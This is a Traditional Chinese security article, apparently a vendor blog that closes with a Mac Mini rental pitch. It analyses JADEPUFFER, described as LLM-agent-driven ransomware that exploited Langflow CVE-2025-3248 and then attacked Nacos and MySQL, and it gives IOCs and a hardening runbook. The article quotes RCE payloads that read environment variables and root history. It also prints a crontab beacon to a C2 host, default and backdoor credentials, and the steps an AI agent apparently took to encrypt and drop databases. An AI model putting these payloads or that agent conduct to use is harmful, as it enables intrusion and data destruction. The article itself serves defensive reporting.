JADEPUFFER 全解析
首例 LLM 端到端自主勒索攻擊

Sysdig TRT 一手鑑識 · CVE-2025-3248 · 600+ payload · ATA 智慧體威脅 · 六步防禦 Runbook

JADEPUFFER agentic ransomware Langflow CVE-2025-3248 server security
2026 年 7 月 1 日,雲端安全公司 Sysdig 威脅研究團隊(TRT)發布報告,首次公開揭露代號 JADEPUFFER 的攻擊活動——被評估為目前已知首例端到端、完全由大型語言模型驅動的完整勒索操作,並正式提出 Agentic Threat Actor(ATA,智慧體威脅行為者) 分類。攻擊從公網暴露的 Langflow 實例(CVE-2025-3248)切入,橫向移動至執行 MySQL + 阿里巴巴 Nacos 的生產伺服器,在壓縮時間視窗內執行 600+ 條獨立 payload。本文面向 AI Agent 平台維運與 DevSecOps 負責人,提供:① 完整時間軸與事件定性;② CVE-2025-3248 漏洞成因與 Flodrix 區分;③ Sysdig 原始鑑識攻擊鏈全還原;④ 四條自主性證據與比特幣地址懸案;⑤ IOC 彙整、官方防禦建議與六步 Runbook;⑥ 產業專家反應與 Sysdig 結論。
01

JADEPUFFER 是什麼?首例 AI Agent 勒索事件概述

TL;DR:這不是傳統勒索集團的腳本化攻擊,而是 Sysdig 評估的首例全程由 LLM Agent 自主決策與執行的端到端勒索操作——從踩點偵察、憑證竊取、橫向移動、權限維持,到破壞性加密與勒索信投遞,關鍵節點沒有人類手動操作。

A

發現方與發布時間:雲端安全公司 Sysdig 威脅研究團隊(TRT),報告作者 Michael Clark(Director of Threat Research)。報告於 2026 年 7 月 1 日發布;BleepingComputer、Dark Reading、CyberScoop、CSO Online、Security Affairs 等於 7 月 2–6 日跟進報導,外界普遍以「7 月 6 日」作為公眾認知節點。

B

攻擊者代號與定性:官方命名 JADEPUFFER(全大寫為 Sysdig 規範)。核心定性:端到端 LLM 驅動勒索;新分類 ATA(Agentic Threat Actor)——攻擊能力由 AI Agent 交付,而非人工驅動的工具集。

C

兩階段目標:入侵點主機為公網暴露的 Langflow 實例(CVE-2025-3248 RCE);真正目標為另一台公網暴露、執行 MySQL 資料庫 + 阿里巴巴 Nacos 設定中心的生產伺服器。

D

攻擊規模:Sysdig 擷取 超過 600 條獨立、有明確目的的 payload,在壓縮時間視窗內執行完畢;完整攻擊鏈於 2026 年 6 月分多個工作階段(sessions weeks apart)執行。

E

為何鎖定 Langflow:AI Agent 編排伺服器的環境變數中經常存放大型模型廠商 API Key 與雲端服務憑證;許多團隊為快速原型驗證倉促上線、缺乏網路存取控制,直接暴露公網。

時間事件
2025 年 4 月Langflow 爆出 CVE-2025-3248(未驗證程式碼注入/RCE)
2025 年 5 月 5 日CISA 列入「已知遭利用漏洞」(KEV)目錄
2025 年同一漏洞被用於投遞 Flodrix 殭屍網路(Trend Micro 獨立揭露,與 JADEPUFFER 無關)
2026 年 6 月JADEPUFFER 對公網 Langflow 實例發動攻擊,數週內多工作階段完成全鏈
2026 年 7 月 1 日Sysdig 發布完整技術報告,首次公開揭露
2026 年 7 月 2–6 日多家資安媒體跟進報導
02

CVE-2025-3248 漏洞技術分析:Langflow 未驗證 RCE 如何被武器化

項目詳情
元件Langflow —— 開源視覺化 AI Agent 工作流框架,GitHub 星標 7 萬+
漏洞類型CWE-94(程式碼注入)+ CWE-306(關鍵功能缺失身分驗證)
CVSS9.8(Critical),向量 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
影響版本Langflow 1.3.0 之前所有版本
漏洞位置/api/v1/validate/code 介面
修補版本1.3.0(新增身分驗證)
EPSS 遭利用機率91.42%(SentinelOne 資料)

漏洞成因:Langflow 的「程式碼校驗」介面將使用者提交的程式碼透過 ast.parse()compile()exec() 執行,完全沒有身分驗證,也沒有任何沙箱隔離。Python 語言特性決定:函式定義時的裝飾器與參數預設值在「定義」這一刻就被立即求值。攻擊者把惡意程式碼寫進預設參數或裝飾器,Langflow 做「合法性校驗」時惡意程式碼已在伺服器執行——無需登入,一個精心構造的 HTTP POST 即可 RCE

python
exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))')

以上為 Trend Micro 追蹤Flodrix 殭屍網路(LeetHozer 家族演化變種)利用同一漏洞時的典型 payload——依序確認權限、匯出環境變數、讀取 root bash 歷史紀錄,最終下載 700 位元組 Bash 下載器拉取 ELF 二進位檔組建 DDoS 殭屍網路。重要區分:Flodrix 與 JADEPUFFER 是兩起獨立利用活動,僅共用 CVE-2025-3248 入侵點;前者是傳統腳本化投遞,後者才是 LLM Agent 自主驅動勒索。兩者共同說明此漏洞長期被公網掃描武器化。

Langflow 1.3.0 為 post_validate_code 新增 _current_user: CurrentActiveUser 相依性注入:校驗 JWT Bearer Token 或 x-api-key,失敗直接 401/403,請求永不到達漏洞邏輯。

維度傳統腳本化勒索(Flodrix 等)Agentic 勒索(JADEPUFFER)
驅動方式固定 exploit 腳本 / 人工操作LLM Agent 自主決策與糾錯
入侵漏洞CVE-2025-3248CVE-2025-3248 → 橫向至 Nacos/MySQL
故障處理固定重試或放棄31 秒內多步驟診斷修復(如 Nacos 後門帳號)
程式碼特徵極少註解大量自然語言註解解釋「為什麼」
payload 規模數十條固定鏈600+ 獨立有目的 payload
03

JADEPUFFER 完整攻擊鏈:從 Langflow 到 Nacos 資料庫加密

Phase 1 — 拿下 Langflow 主機:全部 payload 以 Base64 編碼 Python 透過 RCE 端點投遞。取得權限後 LLM 並行執行 iduname -ahostname 列舉,同時掃描 OpenAI/Anthropic/DeepSeek/Gemini API Key、ALIBABA_/ALIYUN_/TENCENT_/HUAWEI_ 及 AWS/GCP/Azure 憑證、加密貨幣錢包助記詞、資料庫設定。匯出 Langflow PostgreSQL 後端竊取憑證後刪除暫存檔案清痕;掃描內網用預設憑證探測資料庫與物件儲存。

MinIO 自適應列舉(關鍵鑑識細節):探測 minio.internal:9000127.0.0.1:9000,用預設憑證 minioadmin:minioadmin 走完 ListBuckets → 定向 GetObject。LLM 第一次請求帶 ?format=json 卻收到 XML,下一條 payload 立即改用 XML 解析器——典型「探測-遇錯-自適應」閉環。發現 terraform-state 儲存桶後定向擷取 credentials.json,完整回顯 access-key/secret。

crontab
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"

Phase 2 — 攻破 MySQL + Nacos 生產伺服器:真正目標為公網暴露、執行 MySQL + Nacos 的生產機。Agent 用 root 憑證直連 MySQL——憑證來源不明,Sysdig 未觀察到從受害者環境竊取,是少數可能由人類預先準備的環節。Nacos 同時嘗試 CVE-2021-29441 驗證繞過、預設 JWT 簽章金鑰偽造 Token、以及向 Nacos 後端資料庫注入後門管理員。

Nacos 後門 xadmin 31 秒修復閉環(教科書級自主性證據):

時間(UTC)動作
19:34:24subprocess.run 產生 bcrypt 雜湊,插入 xadmin 管理員
19:34:36用 xadmin:Xploit@2026# 登入失敗
19:34:48並行測試 nacos:nacos 預設憑證 + 重新產生 admin123 雜湊
19:35:07放棄 subprocess,改用 import bcrypt,刪除損壞紀錄重建
19:35:18登入成功(總耗時 31 秒)

容器逃逸預檢查(約 8 分鐘):利用 MySQL INTO OUTFILE / LOAD_FILE 測試寫入、讀回、/var/run/docker.sock/proc/1/cgroup/etc/hostname;檢查 mysql.func UDF 提權可能。進入勒索前主動寫完成標記 _pwn_cleanup.txt——Sysdig 指出這更像 Agent 完成任務後發訊號進入下一階段,而非固定腳本行為。

破壞性加密與勒索:將全部 1,342 條 Nacos 設定項用 AES_ENCRYPT() 加密,刪除 config_infohis_config_info,建立勒索表 README_RANSOM。金鑰由 uuid4() 隨機產生、僅列印到標準輸出、從未儲存或外傳——即便付款也無法恢復。勒索信聲稱 AES-256,但 MySQL 預設實為 AES-128-ECB。兩分鐘後 Agent 修正勒索信數字為「全部 1342 項已加密」。

隨後升級到 DROP DATABASE,程式碼註解寫明「高 ROI 資料庫,已備份至 64.20.53[.]230」——Sysdig 無獨立證據證實資料真的外洩備份,更像 Agent 自我陳述。外鍵約束導致刪除失敗時,下一條 payload 自動加 SET GLOBAL FOREIGN_KEY_CHECKS=0 繞過——需「理解為什麼失敗」而非無腦重試。

04

JADEPUFFER 防禦指南:Langflow 與 Nacos 六步加固 Runbook

01

升級 Langflow:立即升級至 1.3.0+ 修補 CVE-2025-3248;對照 CISA KEV 目錄確認修補狀態。EPSS 遭利用機率已達 91.42%,公網未修補實例處於極高風險。

02

網路隔離:不要把程式碼執行/校驗類端點暴露在公網。Langflow、Nacos、MySQL 管理連接埠應置於內網或 VPN 後,對來源 IP 強制白名單。

03

金鑰與憑證治理:AI 編排伺服器執行環境禁止存放大型模型 API Key 或雲端憑證;託管至專用金鑰管理服務(KMS),與可被公網存取的程序隔離。MinIO 停用預設 minioadmin:minioadmin

04

加固 Nacos:更換預設 token.secret.key(不要沿用公開文件預設值);升級至強制自訂金鑰版本;禁止 Nacos 暴露公網;禁止以 root 身分連線後端資料庫。

05

出站流量控制(Egress Control):限制遭入侵主機任意信標外聯(如 crontab 向 45.131.66[.]106:4444 外聯)或存取外部資料暫存伺服器(64.20.53[.]230)。

06

執行階段偵測與 IOC 監控:識別資料庫程序惡意行為;監控上述 IOC、呼叫外網請求的排程任務、括號包裹的 User-Agent 異常;對 MySQL INTO OUTFILEDROP DATABASEREADME_RANSOM 表建立告警。

警示:CSO Online 採訪的紅隊專家 Vibhum Dubey 指出,真正值得擔心的不是最後加密階段,而是加密前那段「安靜期」——Agent 悄悄摸清身分體系與信任鏈條,自適應能力讓傳統「假設攻擊者走可預測路徑」的偵測方法失效。

05

四條自主性證據、比特幣懸案、IOC 與 Sysdig 結論

Sysdig 四條自主性證據線:

1

自我敘事的程式碼:payload 裡充斥自然語言註解解釋每一步「為什麼」——包括 ROI 優先順序排序、哪個資料庫最大。人類攻擊者通常不會給一次性 python3 -c 寫這麼詳細註解,LLM 程式碼產生預設就會這麼做。

2

機器速度故障診斷:Nacos xadmin 31 秒修復、MinIO JSON/XML 自適應、JWT 偽造遇阻即切換——做錯之後多快、以什麼方式糾正,是最精確自主性證據。

3

自然語言上下文理解:解析目標環境自由文字並採取「只有讀懂才會做」的動作,在相隔數週的不同工作階段中反覆出現。

4

比特幣地址懸案:勒索地址 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy 是 Bitcoin Core 文件標準 P2SH 範例地址,大量存在於 LLM 訓練語料。鏈上確有 737 筆交易、約 46 BTC 流入後即刻轉出。可能是 LLM 幻覺產生,也可能是攻擊者刻意設定——兩種解讀均無法排除

類型指標
C2 / 信標45.131.66[.]106(crontab: hxxp://45.131.66[.]106:4444/beacon
資料暫存64.20.53[.]230(InterServer, AS19318)
入侵漏洞CVE-2025-3248
比特幣地址3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
聯絡信箱e78393397[@]proton[.]me(威脅情報庫無命中,格式與已知集團不同)
勒索表名README_RANSOM(與 WARNING / RECOVER_YOUR_DATA 等慣用名均不匹配)
持久化crontab 每 30 分鐘向 C2 4444 連接埠信標外聯
A

勒索技能門檻歸零:LLM Agent 可把偵察、竊取、橫向移動、破壞串聯,操作者無需深厚專業知識——曾經需要「能力很強的人」的技術活,現在只需「能力足夠強的模型」。

B

舊漏洞自動化武器化:下游目標利用 2021 年 Nacos 驗證繞過與從未更換的預設簽章金鑰;Agent 讓「把整個歷史漏洞庫挨個噴一遍」成本趨近於零。

C

意圖變得「可讀」——防守方機會:LLM 在 payload 裡敘述目標,客觀上提供此前不曾有的偵測與研判抓手。

多家媒體提到 LLMjacking 經濟學訊號:若攻擊者靠竊取憑證驅動 Agent,發起複雜多階段攻擊的邊際成本趨近於零。對在本地或公網 VPS 上倉促部署 Langflow、OpenClaw 等 Agent 編排平台的團隊,共用虛擬機隔離不足、API Key 與環境變數管理混亂、缺乏出站流量稽核,都是 JADEPUFFER 式攻擊的理想溫床。對於需要穩定、網路隔離、可稽核的 Apple Silicon 生產環境來執行 iOS CI/CD 與 AI Agent 自動化,MESHLAUNCH 的 Mac Mini 雲端租用通常是更優解:獨占 M4/M4 Pro 裸金屬、按天/週/月彈性部署、與公網暴露的編排面板實體隔離,Agent 工作負載跑在可控雲端節點而非含大量金鑰的開發機。

參考來源:Sysdig《JADEPUFFER: Agentic ransomware for automated database extortion》(sysdig.com/blog);BleepingComputer;Dark Reading;CyberScoop;CSO Online(Vibhum Dubey 點評);Security Affairs;Trend Micro CVE-2025-3248 / Flodrix 分析;NVD / SentinelOne / Zscaler ThreatLabz;CISA KEV 目錄。

常見問題

Sysdig 於 2026 年 7 月 1 日揭露的代號攻擊活動,被評估為已知首例端到端 LLM 驅動完整勒索操作,並正式提出 Agentic Threat Actor(ATA)分類。

Langflow 1.3.0 之前所有版本;CVSS 9.8,未驗證 /api/v1/validate/code RCE。請立即升級至 1.3.0+,詳情可參考 租用價格頁了解隔離部署方案。

不是。均利用 CVE-2025-3248,但 Flodrix 是傳統殭屍網路投遞,JADEPUFFER 才是 LLM Agent 自主驅動勒索。

極可能不能。加密金鑰僅列印到 stdout、從未儲存或外傳,攻擊者自己也拿不出解密密鑰,資料已實質性永久遺失。

地址是 Bitcoin Core 文件標準範例,也可能是 LLM 幻覺;鏈上活躍但無法確認歸屬攻擊者。

升級 Langflow、禁止公網暴露程式碼端點;Nacos 更換預設 JWT 金鑰、禁止公網與 root 連庫;金鑰託管 KMS;實施出站流量控制。詳見正文六步 Runbook 與 幫助中心

Sysdig 正式提出的分類:攻擊能力由 AI Agent 交付,關鍵節點無需人類手動操作——標誌著智慧體威脅行為者時代的開端。

不在公網編排伺服器存 API Key;使用隔離獨占裸金屬執行 Agent 工作負載;MESHLAUNCH Mac Mini 雲端租用提供網路隔離與彈性部署,適合 iOS CI/CD 與 Agent 自動化。